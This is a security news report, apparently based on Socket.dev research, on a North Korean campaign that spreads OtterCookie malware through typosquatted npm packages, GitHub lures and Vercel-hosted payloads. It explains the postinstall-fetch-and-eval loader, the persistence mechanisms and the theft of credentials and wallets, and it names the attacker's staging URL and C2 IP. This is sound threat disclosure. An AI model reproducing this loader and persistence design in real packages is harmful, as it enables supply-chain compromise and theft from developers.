A major security threat has emerged targeting software developers worldwide. North Korean state-sponsored threat actors, operating under the “Contagious Interview” campaign, are systematically spreading malicious packages across npm, GitHub, and Vercel infrastructure to deliver OtterCookie malware.
This sophisticated multi-stage operation demonstrates how threat actors have adapted their tools to target modern JavaScript and Web3 development workflows.
Since October 10, 2025, researchers have uncovered at least 197 new malicious npm packages designed to trick developers into installing compromised code, with over 31,000 additional downloads recorded during this wave alone.
The attack chain works through a carefully coordinated supply chain approach. Threat actors create fake developer portfolios on GitHub, publish typosquatted packages on npm that impersonate legitimate libraries, and use Vercel hosting to stage the malware payloads.
When developers unknowingly install these malicious packages, a postinstall script automatically executes and reaches out to attacker-controlled endpoints to fetch and run the latest OtterCookie variant.
This seamless integration into standard development workflows makes the attack particularly dangerous, as it bypasses traditional security awareness since developers expect npm packages to execute code during installation.
Socket.dev security analysts noted and identified that the infrastructure behind this campaign reveals a well-orchestrated operation.
The researchers traced malicious packages like “tailwind-magic,” which impersonates the legitimate “tailwind-merge” library, to a threat actor-controlled GitHub account named “stardev0914” and a Vercel staging endpoint called “tetrismic.vercel.app.”
.webp "North Korean Hackers Exploiting npm, GitHub, and Vercel to Deliver OtterCookie Malware 3")
This account contained at least 18 repositories designed to serve as both delivery vehicles and convincing lures, with repositories themed around cryptocurrency projects including fake DEX front-ends and token sites.
At least five core malicious packages, including “node-tailwind,” “tailwind-node,” and “react-modal-select,” route through this infrastructure.
The malware architecture itself reflects sophisticated development. OtterCookie operates as a combined infostealer and remote access trojan with cross-platform capabilities spanning Windows, macOS, and Linux.
Once executed within a Node.js process, the malware performs initial environment checks to detect virtual machines and sandboxes, fingerprints the infected host, and then establishes bidirectional communication with command and control servers.
This detection-evasion approach ensures the malware only fully activates on legitimate developer machines rather than analyst environments where security researchers typically operate.
Infection and Persistence Mechanisms
The infection mechanism demonstrates meticulous engineering. The malicious npm packages use a postinstall script that executes when developers run npm install.
This script calls the threat actor endpoint at https://tetrismic.vercel.app/api/ipcheck using axios, which returns JavaScript code embedded in a JSON field named “model.”
.webp "North Korean Hackers Exploiting npm, GitHub, and Vercel to Deliver OtterCookie Malware 4")
The package then extracts this field and executes it with eval inside the victim’s Node.js process, granting the attackers full Node.js privileges and allowing arbitrary code execution.
The staging server continuously updates its main.js payload, enabling threat actors to rotate malware variants across multiple packages and customize responses per target.
Once deployed, OtterCookie establishes persistence through multiple mechanisms. On Windows systems, the malware creates scheduled tasks named “NodeUpdate” that run at logon with highest privileges, and adds registry entries under HKCURunNodeHelper.
The actual payload spawns three asynchronous worker processes using child_process.spawn, each running as a detached Node.js process with stdio redirected to ignore and the windowsHide flag set true.
These processes then unref themselves, allowing them to continue running in the background after the initial loader exits.
![KXCO-branded DEX front end hosted at knightsbridge-dex[.]vercel[.]app (Source - Socket.dev)](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHvcY3VdVm_0fTp8BeJZNxyQsjETQB8Dgqs2MTrILW5NKIyb8eerLUcjDmMdgZglmKqHgEdWVMkyfN0aFFjPar0-3ukKNxVRWcAE6omZSz__5y9X-4asmKc6Oo8iEpLap2uuV95ltVkFzo6L9prnud1VBel8ZONTJ_l-_C4gStxioNiDdHIqHh7j7JYLk/s16000/KXCO-branded%20DEX%20front%20end%20hosted%20at%20knightsbridge-dex%5B.%5Dvercel%5B.%5Dapp%20(Source%20-%20Socket.dev).webp "North Korean Hackers Exploiting npm, GitHub, and Vercel to Deliver OtterCookie Malware 5")
The malware simultaneously performs system-wide keylogging using the GlobalKeyboardListener module, captures screenshots from all connected monitors every 5 seconds, exfiltrates clipboard contents, and recursively scans the filesystem for files matching patterns like “.env,” “metamask,” “phantom,” and “seed” to harvest cryptocurrency wallet data and credentials.
The comprehensive data harvesting capabilities extend to browser profiles. The malware specifically targets Chrome and Brave browsers on all three operating systems, accessing stored login credentials by querying the “Login Data” SQLite database found in each browser’s profile directory.
Additionally, it identifies and extracts data from at least 42 different cryptocurrency wallet browser extensions, including MetaMask, Phantom, Keplr, and dozens of others commonly used by Web3 developers.
All collected data flows through the command and control infrastructure at IP address 144.172.104.117, which handles both data collection and tasking, allowing threat actors to issue remote commands and maintain persistent interactive shell access.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
